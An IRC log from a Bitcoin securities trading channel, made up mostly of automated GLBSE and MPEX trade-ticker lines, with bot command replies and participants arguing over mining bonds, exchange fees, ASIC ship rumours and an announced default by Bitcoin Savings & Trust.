[+] Aug 29 01:28:20 [GLBSE] [ASICMINER] 2 @ 0.109 = 0.218 BTC [-] Aug 29 01:29:32 [GLBSE] [BIB.PIRATE] 49 @ 0.32 = 15.68 BTC [+] Aug 29 01:29:36 [MPEX] [S.MPOE] 1549 @ 0.00039163 = 0.6066 BTC [+] Aug 29 01:29:38 [MPEX] [S.MPOE] 21339 @ 0.00039414 = 8.4106 BTC [+] Aug 29 01:35:15 [GLBSE] [METAL.SILVER] 1 @ 0.099999 BTC [+] Aug 29 01:35:53 [GLBSE] [METAL.SILVER] 1 @ 0.099999 BTC [+] Aug 29 01:36:02 a man, a plan, a canal, panama. Aug 29 01:36:35 [GLBSE] [METAL.SILVER] 2 @ 0.099999 = 0.2 BTC [+] Aug 29 01:37:52 [GLBSE] [GSDPT] 202 @ 0.0032 = 0.6464 BTC [-] Aug 29 01:39:35 [GLBSE] [GSDPT] 1 @ 0.0032 BTC [-] Aug 29 01:40:53 [GLBSE] [GSDPT] 8 @ 0.0032 = 0.0256 BTC [-] Aug 29 01:41:35 [GLBSE] [BDT] 2 @ 1.05 = 2.1 BTC [+] Aug 29 01:43:24 [GLBSE] [TEEK.B] 1 @ 0.999 BTC [+] Aug 29 01:43:26 [GLBSE] [TEEK.B] 2 @ 1 = 2 BTC [+] Aug 29 01:50:36 [MPEX] [S.MPOE] 1500 @ 0.00039035 = 0.5855 BTC [-] Aug 29 01:50:38 [MPEX] [S.MPOE] 52700 @ 0.00039013 = 20.5599 BTC [-] Aug 29 02:00:30 [GLBSE] [OBSI.HRPT] 1 @ 0.103 BTC [-] Aug 29 02:00:32 [GLBSE] [OBSI.HRPT] 10 @ 0.1028002 = 1.028 BTC [-] Aug 29 02:00:33 [GLBSE] [OBSI.HRPT] 1 @ 0.1028001 BTC [-] Aug 29 02:00:35 [GLBSE] [OBSI.HRPT] 1 @ 0.1028 BTC [-] Aug 29 02:00:35 [GLBSE] [OBSI.HRPT] 10 @ 0.10201 = 1.0201 BTC [-] Aug 29 02:00:36 [GLBSE] [OBSI.HRPT] 1 @ 0.102 BTC [-] Aug 29 02:00:37 [GLBSE] [OBSI.HRPT] 50 @ 0.102 = 5.1 BTC [-] Aug 29 02:00:38 [GLBSE] [OBSI.HRPT] 3 @ 0.1004103 = 0.3012 BTC [-] Aug 29 02:03:19 [GLBSE] [TYGRR.BOND-P] 7 @ 0.325 = 2.275 BTC [+] Aug 29 02:03:20 [GLBSE] [TYGRR.BOND-P] 6 @ 0.32989 = 1.9793 BTC [+] Aug 29 02:03:46 [GLBSE] [GIGAMINING] 4 @ 0.9201 = 3.6804 BTC [-] Aug 29 02:03:46 [GLBSE] [GIGAMINING] 100 @ 0.92 = 92 BTC [-] Aug 29 02:04:22 [GLBSE] [TYGRR.BOND-P] 3 @ 0.32989 = 0.9897 BTC [+] Aug 29 02:05:45 [GLBSE] [TYGRR.BOND-P] 2 @ 0.32989 = 0.6598 BTC [+] Aug 29 02:06:39 [GLBSE] [TYGRR.BOND-P] 39 @ 0.32989 = 12.8657 BTC [+] Aug 29 02:06:41 [GLBSE] [TYGRR.BOND-P] 3 @ 0.333 = 0.999 BTC [+] Aug 29 02:06:42 [GLBSE] [YABMC] 1 @ 0.1381 BTC [+] Aug 29 02:06:43 [GLBSE] [YABMC] 20 @ 0.1379 = 2.758 BTC [-] Aug 29 02:06:47 [GLBSE] [OBSI.ABMO] 7 @ 0.07999999 = 0.56 BTC [+] Aug 29 02:07:14 [GLBSE] [YABMC] 2 @ 0.1379 = 0.2758 BTC [-] Aug 29 02:11:04 !help Aug 29 02:11:05 List of commands: Aug 29 02:11:06 !ticker (desc: returns current GLBSE/MPEX ticker values) Aug 29 02:11:07 !pl [@] [] (desc: profit loss calc for GLBSE assets) Aug 29 02:11:22 whatcha need sns ? Aug 29 02:12:44 You scared him off mircea_popescu Aug 29 02:12:53 [GLBSE] [YABMC] 3 @ 0.1389 = 0.4167 BTC [+] Aug 29 02:13:40 just tryin to halp... Aug 29 02:15:39 [GLBSE] [GIGAMINING] 4 @ 0.9001 = 3.6004 BTC [-] Aug 29 02:15:41 [GLBSE] [GIGAMINING] 5 @ 0.9 = 4.5 BTC [-] Aug 29 02:15:42 [GLBSE] [GIGAMINING] 20 @ 0.9 = 18 BTC [-] Aug 29 02:23:19 [GLBSE] [TYGRR.BOND-PI] 8 @ 0.9999999 = 8 BTC [-] Aug 29 02:25:15 [GLBSE] [GSDPT] 5000 @ 0.0032 = 16 BTC [-] Aug 29 02:32:03 [GLBSE] [GIGAMINING] 7 @ 0.8999 = 6.2993 BTC [-] Aug 29 02:33:42 [GLBSE] [BITCOINRS] 95 @ 0.050999 = 4.8449 BTC [+] Aug 29 02:34:13 [GLBSE] [BITCOINRS] 4 @ 0.050999 = 0.204 BTC [+] Aug 29 02:34:45 [GLBSE] [TEEK.B] 3 @ 0.85020001 = 2.5506 BTC [-] Aug 29 02:44:01 [GLBSE] [BITCOINMINV] 6 @ 0.138 = 0.828 BTC [-] Aug 29 02:44:58 [MPEX] [S.MPOE] 9300 @ 0.00038961 = 3.6234 BTC [-] Aug 29 02:44:59 [MPEX] [S.MPOE] 16283 @ 0.00038834 = 6.3233 BTC [-] Aug 29 02:45:00 [MPEX] [S.MPOE] 2117 @ 0.00038798 = 0.8214 BTC [-] Aug 29 02:47:38 [MPEX] [S.BVPS] 150 @ 0.00344763 = 0.5171 BTC [-] Aug 29 02:49:51 [GLBSE] [ASICMINER] 20 @ 0.122 = 2.44 BTC [+] Aug 29 02:49:53 [GLBSE] [ASICMINER] 50 @ 0.123 = 6.15 BTC [+] Aug 29 02:51:12 [GLBSE] [YABMC] 1 @ 0.1389 BTC [+] Aug 29 02:51:33 [GLBSE] [ASICMINER] 20 @ 0.124 = 2.48 BTC [+] Aug 29 02:51:35 [GLBSE] [ASICMINER] 50 @ 0.125 = 6.25 BTC [+] Aug 29 02:51:36 [GLBSE] [ASICMINER] 100 @ 0.1299 = 12.99 BTC [+] Aug 29 02:51:37 [GLBSE] [ASICMINER] 50 @ 0.13 = 6.5 BTC [+] Aug 29 02:53:52 [GLBSE] [BITCOINMINV] 1 @ 0.138 BTC [-] Aug 29 03:01:15 [GLBSE] [FPGAMINING] 4 @ 0.83910001 = 3.3564 BTC [+] Aug 29 03:01:17 [GLBSE] [FPGAMINING] 6 @ 0.83900001 = 5.034 BTC [-] Aug 29 03:01:18 [GLBSE] [FPGAMINING] 20 @ 0.839 = 16.78 BTC [-] Aug 29 03:04:39 Oy... 10K BTC profit on SD now. http://bitcointalk.org/index.php?topic=80312.220 It's like you walk around Vegas and realize who really paid for all that. Aug 29 03:06:39 [GLBSE] [YABMC] 29 @ 0.138 = 4.002 BTC [-] Aug 29 03:06:41 [GLBSE] [YABMC] 18 @ 0.1379 = 2.4822 BTC [-] Aug 29 03:06:42 [GLBSE] [YABMC] 2 @ 0.13 = 0.26 BTC [-] Aug 29 03:06:43 [GLBSE] [YABMC] 4 @ 0.1275 = 0.51 BTC [-] Aug 29 03:06:44 [GLBSE] [YABMC] 99 @ 0.1232 = 12.1968 BTC [-] Aug 29 03:06:45 [GLBSE] [YABMC] 50 @ 0.123 = 6.15 BTC [-] Aug 29 03:06:46 [GLBSE] [YABMC] 10 @ 0.1228 = 1.228 BTC [-] Aug 29 03:06:47 [GLBSE] [YABMC] 8 @ 0.1228 = 0.9824 BTC [-] Aug 29 03:06:48 [GLBSE] [YABMC] 30 @ 0.1225 = 3.675 BTC [-] Aug 29 03:06:50 [GLBSE] [YABMC] 10 @ 0.1222 = 1.222 BTC [-] Aug 29 03:06:51 [GLBSE] [YABMC] 14 @ 0.122 = 1.708 BTC [-] Aug 29 03:06:52 [GLBSE] [YABMC] 10 @ 0.121 = 1.21 BTC [-] Aug 29 03:06:53 [GLBSE] [YABMC] 100 @ 0.12 = 12 BTC [-] Aug 29 03:07:28 safra sgnb sgornick Shaded Shalom_ smickles SomeoneWeird SuprTiggr Sysrq3 Aug 29 03:07:30 sgornick wow ? Aug 29 03:10:06 [GLBSE] [BITBOND] 4 @ 0.42 = 1.68 BTC [-] Aug 29 03:10:08 [GLBSE] [BITBOND] 1 @ 0.415 BTC [-] Aug 29 03:10:09 [GLBSE] [BITBOND] 12 @ 0.4101 = 4.9212 BTC [-] Aug 29 03:10:10 [GLBSE] [BITBOND] 1 @ 0.41 BTC [-] Aug 29 03:10:45 [GLBSE] [BITCOINMINV] 25 @ 0.138 = 3.45 BTC [-] Aug 29 03:10:49 sgornick: is that all time profit? Aug 29 03:11:57 maximian: Yes, since April 24th or thereabouts. Aug 29 03:13:24 Total of 635K BTC wagered. Aug 29 03:14:27 doing pretty well huh Aug 29 03:15:10 For a two-person side project, I think you can conclude yes, very well. Aug 29 03:16:25 lmao that asshat is on a forum campaign to fud sdice ? Aug 29 03:16:28 how very impressive, Aug 29 03:16:47 gmaxwell i mean. Aug 29 03:17:14 [GLBSE] [GSDPT] 3 @ 0.0032 = 0.0096 BTC [-] Aug 29 03:17:53 [MPEX] [S.MPOE] 11924 @ 0.00038798 = 4.6263 BTC [-] Aug 29 03:17:54 [MPEX] [S.MPOE] 9376 @ 0.00038657 = 3.6245 BTC [-] Aug 29 03:21:39 [MPEX] [S.MPOE] 200 @ 0.00038732 = 0.0775 BTC [+] Aug 29 03:21:40 [MPEX] [S.MPOE] 13372 @ 0.00038657 = 5.1692 BTC [-] Aug 29 03:23:11 [GLBSE] [ASICMINER] 12 @ 0.133333 = 1.6 BTC [+] Aug 29 03:23:54 [GLBSE] [YABMC] 10 @ 0.103 = 1.03 BTC [-] Aug 29 03:23:56 [GLBSE] [YABMC] 39 @ 0.1021 = 3.9819 BTC [-] Aug 29 03:23:56 [GLBSE] [YABMC] 60 @ 0.102 = 6.12 BTC [-] Aug 29 03:23:57 [GLBSE] [YABMC] 4 @ 0.101 = 0.404 BTC [-] Aug 29 03:23:59 [GLBSE] [YABMC] 99 @ 0.101 = 9.999 BTC [-] Aug 29 03:24:00 [GLBSE] [YABMC] 48 @ 0.1 = 4.8 BTC [-] Aug 29 03:24:01 [GLBSE] [ASICMINER] 33 @ 0.12123 = 4.0006 BTC [-] Aug 29 03:24:28 [GLBSE] [ASICMINER] 8 @ 0.12113 = 0.969 BTC [-] Aug 29 03:24:52 [GLBSE] [ASICMINER] 30 @ 0.121 = 3.63 BTC [-] Aug 29 03:25:40 [GLBSE] [ASICMINER] 1 @ 0.12009191 BTC [-] Aug 29 03:25:44 Did i read somewhere that bfl announced they wouldn't ship asic until january now? Aug 29 03:25:57 o wow Aug 29 03:26:28 I think this is why asicminer is trading so high Aug 29 03:26:34 if that information is correct Aug 29 03:26:58 Title: BFL Labs ASIC release date - no earlier than February 2013 Aug 29 03:27:20 old bs from june Aug 29 03:27:23 i can't find a reference Aug 29 03:28:06 Hi guys, I basically had a prophetic dream vision last night, that the BFL Labs ASIC won't be shipped until February 2013 at best. Aug 29 03:28:06 I don't even want them to ship, they're gonna ruin Bitcoins. I spent ~2000$ on quad 7970's, only the cards, and they're planning to release a "coffee warmer" 3ghs+ ASIC that does more than my cards for 150$? Eff that, difficulty will skyrocket and put a strain on video card miners. Aug 29 03:28:14 this is hysterically typical for the forum mentality. Aug 29 03:28:29 ppl doing big things ? it's gonna ruin my crummy two bit interest! BAD FOR BITCOIN! Aug 29 03:29:04 I must have got caught up in some fud somewhere Aug 29 03:29:18 It was known long ago that it would go CPU > GPU > FPGA > ASIC Aug 29 03:29:32 solution? Buy ASIC, we don't have a better technology yet Aug 29 03:29:51 ifthese thigns really are asic. Aug 29 03:29:59 thing is, "asic" doesn't name ONE thing like gpu does. Aug 29 03:30:11 asics can go one , maybe even two degrees of magnitude in $/Hg Aug 29 03:31:23 [MPEX] [F.GIGA.ETF] 4900 @ 0.00096647 = 4.7357 BTC [-] Aug 29 03:37:41 [GLBSE] [TYGRR.BOND-P] 17 @ 0.333 = 5.661 BTC [+] Aug 29 03:38:34 [GLBSE] [TYGRR.BOND-P] 17 @ 0.333 = 5.661 BTC [+] Aug 29 03:39:39 too much bitcoins are being created and not enough commerce Aug 29 03:40:46 how do you figure that ? Aug 29 03:48:22 [GLBSE] [PUREMINING] 1 @ 0.095 BTC [+] Aug 29 03:48:23 [GLBSE] [PUREMINING] 28 @ 0.09605 = 2.6894 BTC [+] Aug 29 03:49:12 BlackICED: I agree Aug 29 03:49:22 but its not the creation thats the problem Aug 29 03:49:30 its the fact that EVERY GODDAMNED THING ON GLBSE IS MINING Aug 29 03:51:09 move to mpex. Aug 29 03:51:31 mpex only has bitvps Aug 29 03:51:39 sdice, mpoe, bonds, options etc. Aug 29 03:51:39 and options masturbation Aug 29 03:51:47 mpoe doesnt count Aug 29 03:51:51 right lol Aug 29 03:52:00 so its pretty much just sdice and bitvps Aug 29 03:52:23 there's two companies at all in btc land, and neither count. nor do options. or bonds. woe unto us that all that exists is miner bonds. Aug 29 03:52:38 [GLBSE] [TYGRR.BOND-P] 13 @ 0.333 = 4.329 BTC [+] Aug 29 03:52:40 [GLBSE] [TYGRR.BOND-P] 10 @ 0.339 = 3.39 BTC [+] Aug 29 03:52:41 [GLBSE] [TYGRR.BOND-P] 50 @ 0.33999999 = 17 BTC [+] Aug 29 03:52:42 [GLBSE] [TYGRR.BOND-P] 67 @ 0.39995 = 26.7967 BTC [+] Aug 29 03:52:44 [GLBSE] [TYGRR.BOND-P] 10 @ 0.45 = 4.5 BTC [+] Aug 29 03:53:06 mircea_popescu: bonds, miner or not, wont keep bitstreet working. Aug 29 03:53:20 "There are ways to change the way hashes are made to break an ASIC. ASIC is hard wired. It can't change at all. FPGA can be reprogrammed with a new bitstream. GPUs are the same. A very minor change could make a lot of expensive paperweights and would be a great way to keep bitcoin operating the way it was meant, openly accessible to virtually anyone with everyday hardware, not a bunch of elites with fancy expensive hardware. It's s Aug 29 03:53:20 upposed to be run by the people, not the "1%"" Aug 29 03:53:25 ahaha the commies this is so funnay. Aug 29 03:54:19 mircea_popescu: as much as we hate the apples and the exxons and shit like that Aug 29 03:54:23 they make the money flow Aug 29 03:54:38 they do it in a completely irresponsible way, but they DO do it Aug 29 03:55:17 what's that in relation to ? Aug 29 03:55:56 mpex being annorexic Aug 29 03:55:59 and glbse too Aug 29 03:56:14 asicminer at least is shares in an actual company selling mining hardware Aug 29 03:56:25 it skirts out from under the whole mining bond/share shit Aug 29 03:56:28 [GLBSE] [FOO.PPPPT] 8 @ 0.4499 = 3.5992 BTC [+] Aug 29 03:56:30 [GLBSE] [FOO.PPPPT] 20 @ 0.5 = 10 BTC [+] Aug 29 03:57:01 you're so weird. Aug 29 03:57:11 so you put some vaporware above a proven company that's only 10x the size ? Aug 29 03:57:13 [GLBSE] [BIB.PIRATE] 49 @ 0.46 = 22.54 BTC [+] Aug 29 03:57:26 mircea_popescu: vs what? Aug 29 03:57:41 asicminer is worth what, 50k btc ? Aug 29 03:58:19 no, I mean, where are these other real companies Aug 29 03:58:28 asicminer, dmc, bitvps, what? whats left? Aug 29 03:58:39 s.dice is one. s.mpoe is the other. Aug 29 03:58:44 currently that's all btc has. Aug 29 03:58:45 [GLBSE] [BIB.PIRATE] 6 @ 0.5 = 3 BTC [+] Aug 29 03:58:53 strange time to buy ppts Aug 29 03:58:55 mpoe doesnt count because its just mpex traidng itself on mpex Aug 29 03:58:59 there's not much worth in the million usd. Aug 29 03:59:12 Diablo-D3 you know, you can buy nasdaq shares. Aug 29 03:59:12 and sdice is unregulated gambling Aug 29 03:59:21 on mpex? Aug 29 03:59:32 no dude, on nasdaq. you know... you don't HAVE to make sense. Aug 29 03:59:38 [GLBSE] [TYGRR.BOND-P] 1 @ 0.2302 BTC [-] Aug 29 03:59:40 [GLBSE] [TYGRR.BOND-P] 4 @ 0.2301 = 0.9204 BTC [-] Aug 29 03:59:41 [GLBSE] [TYGRR.BOND-P] 25 @ 0.23 = 5.75 BTC [-] Aug 29 03:59:42 huh, noone buys/sells mpex but mpex? Aug 29 03:59:42 [GLBSE] [TYGRR.BOND-P] 20 @ 0.22 = 4.4 BTC [-] Aug 29 03:59:43 [GLBSE] [TYGRR.BOND-P] 6 @ 0.2002 = 1.2012 BTC [-] Aug 29 03:59:44 i'm jut pointing out that if you start nutty the world will necessarily seem nutty. Aug 29 03:59:44 [GLBSE] [TYGRR.BOND-P] 8 @ 0.2 = 1.6 BTC [-] Aug 29 03:59:45 [GLBSE] [TYGRR.BOND-P] 19 @ 0.1521 = 2.8899 BTC [-] Aug 29 03:59:46 [GLBSE] [TYGRR.BOND-P] 9 @ 0.152 = 1.368 BTC [-] Aug 29 04:00:11 mircea_popescu: nasdaq is an actual financial company though Aug 29 04:00:14 sigh. Aug 29 04:00:17 [GLBSE] [BIB.PIRATE] 4 @ 0.2003 = 0.8012 BTC [-] Aug 29 04:00:18 [GLBSE] [BIB.PIRATE] 10 @ 0.2 = 2 BTC [-] Aug 29 04:00:18 with actual employees providing an actual service Aug 29 04:00:24 much like what, asicminer ? you ? Aug 29 04:00:43 mircea_popescu: if mpex was so awesome, why didnt dmc ipo in it. Aug 29 04:00:46 *on Aug 29 04:00:47 "an actual company", what actualizes a company? Aug 29 04:00:48 [GLBSE] [ARS] 20 @ 0.0145 = 0.29 BTC [-] Aug 29 04:00:50 what's dmc ? Aug 29 04:00:54 [GLBSE] [TYGRR.BOND-P] 6 @ 0.1521 = 0.9126 BTC [+] Aug 29 04:00:54 [GLBSE] [TYGRR.BOND-P] 10 @ 0.152 = 1.52 BTC [-] Aug 29 04:00:56 [GLBSE] [TYGRR.BOND-P] 100 @ 0.15111 = 15.111 BTC [-] Aug 29 04:00:57 [GLBSE] [TYGRR.BOND-P] 10 @ 0.151 = 1.51 BTC [-] Aug 29 04:00:58 [GLBSE] [TYGRR.BOND-P] 30 @ 0.111 = 3.33 BTC [-] Aug 29 04:01:00 DID HE JUST SAY WHATS DMC?! Aug 29 04:01:03 holy fucking shit. Aug 29 04:01:10 o lmao, your crummy wannabe miner thing ? Aug 29 04:01:12 mircea_popescu has been trolling me the whole time Aug 29 04:01:15 i don't think i'd have accepted it. Aug 29 04:01:43 !pl dmc 1 Aug 29 04:01:43 Requesting data from GLBSE (might take a while). Aug 29 04:01:52 DMC [1@1BTC] paid: 0.02635814 BTC. Last price: 0.06 BTC. Capital gain: -0.94 BTC. Total: -0.91364186 BTC. (-91.4%) Aug 29 04:01:55 mircea_popescu: Im not sure you would have actually had that much of a choice Aug 29 04:01:59 aw, -91%? Aug 29 04:02:00 ... Aug 29 04:02:08 people are weird about that kind of shit Aug 29 04:02:09 lmao what do you mean, not that much of a choice Aug 29 04:02:12 !pl BTC-MINING Aug 29 04:02:12 !pl [@] [] Aug 29 04:02:13 [GLBSE] [BIB.PIRATE] 6 @ 0.1601 = 0.9606 BTC [-] Aug 29 04:02:14 and I dont think I'd be able to stop them Aug 29 04:02:14 [GLBSE] [BIB.PIRATE] 35 @ 0.16 = 5.6 BTC [-] Aug 29 04:02:16 [GLBSE] [BIB.PIRATE] 1 @ 0.14 BTC [-] Aug 29 04:02:17 [GLBSE] [BIB.PIRATE] 13 @ 0.13120001 = 1.7056 BTC [-] Aug 29 04:02:27 !pl BTC-MINING 1 Aug 29 04:02:28 Requesting data from GLBSE (might take a while). Aug 29 04:02:31 hey, pirate is doing real well. Aug 29 04:02:33 pirate just defaulted Aug 29 04:02:37 !ticker BIB.PIRATE Aug 29 04:02:39 BTC-Mining: did you ipo at 1 btc? Aug 29 04:02:40 BTC-MINING [1@1BTC] paid: 0.22956661 BTC. Last price: 0.98 BTC. Capital gain: -0.02 BTC. Total: 0.20956661 BTC. (21%) Aug 29 04:02:45 [GLBSE:BIB.PIRATE] [Bid: 0.2003] [Ask: 0.46] [Spread: 0.2597] [Last: 0.13120001] [24hVol: 47.4306] [7dAvg: 0.43031833] Aug 29 04:02:47 he officially announced it? Aug 29 04:02:52 He made a statement? Aug 29 04:02:56 yes Aug 29 04:02:58 yes Aug 29 04:02:58 o wow. Aug 29 04:02:59 derp Aug 29 04:03:00 url Aug 29 04:03:05 IRC LOL Aug 29 04:03:08 Smickles, yes, Ipoed at 1 Aug 29 04:03:08 [GLBSE] [FOO.PPPPT] 5 @ 0.2 = 1 BTC [-] Aug 29 04:03:09 [GLBSE] [FOO.PPPPT] 23 @ 0.15 = 3.45 BTC [-] Aug 29 04:03:16 herp Aug 29 04:03:19 00:55 <@pirateat40> Bitcoin Savings & Trust has hereby given notice of default to it's account holders. Aug 29 04:03:28 oh Aug 29 04:03:28 from #btcst Aug 29 04:03:30 irc doesnt count Aug 29 04:03:38 bitcointalk forum urls or gtfo. Aug 29 04:03:43 he said "I invested all of pirate bank in DMC and lost 91%" Aug 29 04:03:49 ahahahaa Aug 29 04:03:51 lol Aug 29 04:03:59 yeah, I love how glbse thinks I lost 91%. Aug 29 04:04:07 usagi and co are like "fuck yes, cheap shares" Aug 29 04:04:30 !ticker dmc Aug 29 04:04:32 [GLBSE:DMC] [Bid: 0.05835] [Ask: 0.06889999] [Spread: 0.01054999] [Last: 0.06] [24hVol: 30.5109965] [7dAvg: 0.05876178] Aug 29 04:04:45 diablo, did you start at 1? Aug 29 04:04:46 i don't see how glbse shares are worth anything in principle Aug 29 04:04:51 did you drop to .05 Aug 29 04:04:52 seeing how people can dilute, and many actually do. Aug 29 04:05:11 i dont see how bitcoin is worth anything in princple Aug 29 04:05:12 [GLBSE] [TYGRR.BOND-P] 16 @ 0.0601 = 0.9616 BTC [-] Aug 29 04:05:13 [GLBSE] [TYGRR.BOND-P] 10 @ 0.06 = 0.6 BTC [-] Aug 29 04:05:14 [GLBSE] [TYGRR.BOND-P] 100 @ 0.06 = 6 BTC [-] Aug 29 04:05:15 [GLBSE] [TYGRR.BOND-P] 4 @ 0.041111 = 0.1644 BTC [-] Aug 29 04:05:23 oh, .06 rather Aug 29 04:05:36 [GLBSE] [MOORE] 1 @ 0.5 BTC [+] Aug 29 04:05:41 that's a bout a 95% loss, and you haven't paid that much in dividends Aug 29 04:06:41 smickles: the problem is the rest of the market froze Aug 29 04:06:42 [GLBSE] [FOO.PPPPT] 5 @ 0.2001 = 1.0005 BTC [+] Aug 29 04:06:43 [GLBSE] [FOO.PPPPT] 27 @ 0.15 = 4.05 BTC [-] Aug 29 04:06:44 [GLBSE] [FOO.PPPPT] 3 @ 0.14 = 0.42 BTC [-] Aug 29 04:06:46 which is extra hilarious Aug 29 04:06:49 lmao Aug 29 04:06:53 [GLBSE] [BIB.PIRATE] 22 @ 0.13120001 = 2.8864 BTC [-] Aug 29 04:06:55 [GLBSE] [BIB.PIRATE] 13 @ 0.131 = 1.703 BTC [-] Aug 29 04:06:56 Diablo-D3: do a pl on mpoeetf or SS Aug 29 04:06:57 theres a shitload of 1mash bonds selling for more than 0.01 each Aug 29 04:07:00 but no one is buying Aug 29 04:07:01 [GLBSE] [BIB.PIRATE] 7 @ 0.131 = 0.917 BTC [-] Aug 29 04:07:02 [GLBSE] [BIB.PIRATE] 50 @ 0.13 = 6.5 BTC [-] Aug 29 04:07:06 good PPT buying op here people Aug 29 04:07:13 lol dub Aug 29 04:07:15 Diablo-D3: those mining 'bonds' are shti Aug 29 04:07:16 rub it in, dub :D Aug 29 04:07:18 get in while the gettins good Aug 29 04:07:19 SHIT Aug 29 04:07:20 SHIT Aug 29 04:07:22 SHIT Aug 29 04:07:23 smickles: at those prices? yes they are Aug 29 04:07:27 ;ticker Aug 29 04:07:30 at almost any price Aug 29 04:07:31 [GLBSE] [BIB.PIRATE] 45 @ 0.10000001 = 4.5 BTC [-] Aug 29 04:07:40 Im waiting for the market to drop them down below to single digit thousandths Aug 29 04:07:48 thats about how much they're worth Aug 29 04:08:21 [GLBSE] [NYAN.C] 6 @ 0.55 = 3.3 BTC [-] Aug 29 04:08:23 [GLBSE] [NYAN.C] 25 @ 0.54 = 13.5 BTC [-] Aug 29 04:08:23 [GLBSE] [NYAN.C] 15 @ 0.45 = 6.75 BTC [-] Aug 29 04:08:25 [GLBSE] [NYAN.C] 2 @ 0.4 = 0.8 BTC [-] Aug 29 04:08:33 and d, if the rest of the market froze, how come other things have done well? Aug 29 04:08:34 incredible how little liquidity glbse has Aug 29 04:08:40 30 btc worth of sales takes a symbol down 20% Aug 29 04:08:45 smickles: I mean the mining market Aug 29 04:08:49 not the unrelated pirate shit Aug 29 04:09:04 jusus fuck, move the goal posts and give me anoter straw man Aug 29 04:09:07 Diablo-D3 while you lost 90% of investor's money smickles made like 1200%. Aug 29 04:09:11 bout same interval. Aug 29 04:09:20 smickles: wtf do you invest in anyhow? Aug 29 04:09:29 me personally? Aug 29 04:09:31 o you wouldn't have heard of it lol Aug 29 04:09:39 no, smickle co. Aug 29 04:09:46 there isn't a smickle co Aug 29 04:09:54 then what is mircea_popescu talking about Aug 29 04:10:05 he's talking about my managed fund Aug 29 04:10:06 !pl MPOE.ETF 0.1 Aug 29 04:10:07 Requesting data from GLBSE (might take a while). Aug 29 04:10:08 mpoe.etf Aug 29 04:10:08 MPOE.ETF [1@0.1BTC] paid: 0.0104835 BTC. Last price: 1.4 BTC. Capital gain: 1.3 BTC. Total: 1.3104835 BTC. (1310.5%) Aug 29 04:10:18 smickles: okay fine, what is mpoe.etf invested in Aug 29 04:10:24 lolz Aug 29 04:10:27 s.mpoe Aug 29 04:10:30 =| Aug 29 04:10:33 ahahaha Aug 29 04:10:37 this was like... lol Aug 29 04:10:41 that's what it was intended to do Aug 29 04:10:58 so what does mpoe do to make money? Aug 29 04:11:01 it did what the plan was, the plan worked Aug 29 04:11:10 it trades options and stocks dood. Aug 29 04:11:16 It gets fees on options and transactions? Aug 29 04:11:24 Diablo-D3: buys, sells and receives dividends of s.mpoe Aug 29 04:11:38 mircea_popescu: yes, which is a losing proposition since you cant get cheap enough hosting Aug 29 04:11:39 er, that's what mpoe.etf does Aug 29 04:11:43 [GLBSE] [PPT.E] 10 @ 0.3615 = 3.615 BTC [-] Aug 29 04:11:43 ... Aug 29 04:11:48 wait. WHAT ?! Aug 29 04:12:09 unless you're charging obscene fees Aug 29 04:12:16 im lost. Aug 29 04:12:17 which isnt a winning strategy either Aug 29 04:12:19 [GLBSE] [BIF.BTCST.PPT] 2 @ 0.11 = 0.22 BTC [-] Aug 29 04:12:25 mircea_popescu: okay, its like this Aug 29 04:12:29 [GLBSE] [JAH] 1 @ 0.165 BTC [+] Aug 29 04:12:31 I know you're not buying dedis from me. Aug 29 04:12:35 Diablo-D3: how do you figure that mpex hosting costs too much? Aug 29 04:12:36 dude. i charge 0.2%. at my current month load that's 300 btc just from fucken trade fees. Aug 29 04:12:45 what server costs 3000 dollars a month ? Aug 29 04:12:52 mircea_popescu: your fees are too high Aug 29 04:12:53 gotcha. Aug 29 04:12:59 [09:12:01] unless you're charging obscene fees Aug 29 04:12:59 [09:12:01] unless you're charging obscene fees Aug 29 04:13:00 o.o Aug 29 04:13:00 [09:12:01] unless you're charging obscene fees Aug 29 04:13:00 [09:12:01] unless you're charging obscene fees Aug 29 04:13:08 0.2% is obscene ? Aug 29 04:13:09 naught point 2 percent is too hight? Aug 29 04:13:14 smickles: yup. Aug 29 04:13:15 i gotta have to print this nao. Aug 29 04:13:35 Diablo-D3: care to give a reason why you think that Aug 29 04:13:36 ? Aug 29 04:13:46 it's because the market froze up Aug 29 04:13:49 smickles: because it can always be done cheaper. Aug 29 04:13:56 also, buttered toast! Aug 29 04:14:13 Diablo-D3: that's not a reason why they are too high Aug 29 04:14:21 smickles: the fuck it isnt. Aug 29 04:14:48 its not like mircea_popescu has to deal with *shakes 8ball* regulatory capture and *shakes 8ball* CEO yachts Aug 29 04:14:49 but anything can be done cheaper until there isn't any transaction of value? Aug 29 04:15:06 [GLBSE] [GSDPT] 200 @ 0.0032 = 0.64 BTC [-] Aug 29 04:15:24 Diablo-D3 so far between you and me, i'm the one with the yachtwind in my curls. Aug 29 04:15:28 do, if i understand you, everything ever is overpriced Aug 29 04:15:44 smickles: pretty much. Aug 29 04:16:01 by this philosophy i'd have had to ipo him for free. Aug 29 04:16:07 Diablo-D3: the, you ethically disagree with charging for anything? Aug 29 04:16:23 Diablo-D3 is officially not allowed on btcf nao. Aug 29 04:16:24 no, I just ethically disagree with paying for it :< Aug 29 04:17:09 so, basically, your earlier statement about mpex fees/server cost were meaningless Aug 29 04:17:40 00:55 <@pirateat40> Bitcoin Savings & Trust has hereby given notice of default to it's account holders. Aug 29 04:17:41 lacking even existential import, it seems Aug 29 04:17:46 you know, dude can't even spell its correctly. Aug 29 04:17:55 [GLBSE] [GSDPT] 17 @ 0.0032 = 0.0544 BTC [-] Aug 29 04:18:00 give me a break on spellin :/ Aug 29 04:18:05 wasn't it a quote ? Aug 29 04:18:09 (oh, did you mean pirate? Aug 29 04:18:11 yes. Aug 29 04:18:14 [GLBSE] [FOO.PPPPT] 7 @ 0.1401 = 0.9807 BTC [+] Aug 29 04:18:15 [GLBSE] [FOO.PPPPT] 47 @ 0.14 = 6.58 BTC [-] Aug 29 04:18:17 yeah, that was copypasta Aug 29 04:18:28 so then, mr susceptible. Aug 29 04:18:31 [MPEX] [F.GIGA.ETF] 200 @ 0.00096647 = 0.1933 BTC [-] Aug 29 04:18:32 [MPEX] [F.GIGA.ETF] 8600 @ 0.0009692 = 8.3351 BTC [+] Aug 29 04:18:52 but yes, I am trolling Aug 29 04:19:01 mircea_popescu: who are you buying your hosting from anyhow? Aug 29 04:19:06 gnax. Aug 29 04:19:11 and others. Aug 29 04:19:16 why them? Aug 29 04:19:34 i like the datacenter, i know the people, been there for years etc. Aug 29 04:19:41 ahh Aug 29 04:19:46 im what you'd call a mvc Aug 29 04:20:28 [GLBSE] [YABMC] 2 @ 0.1001 = 0.2002 BTC [+] Aug 29 04:20:39 I can think of at least three things that are mvcs, and its 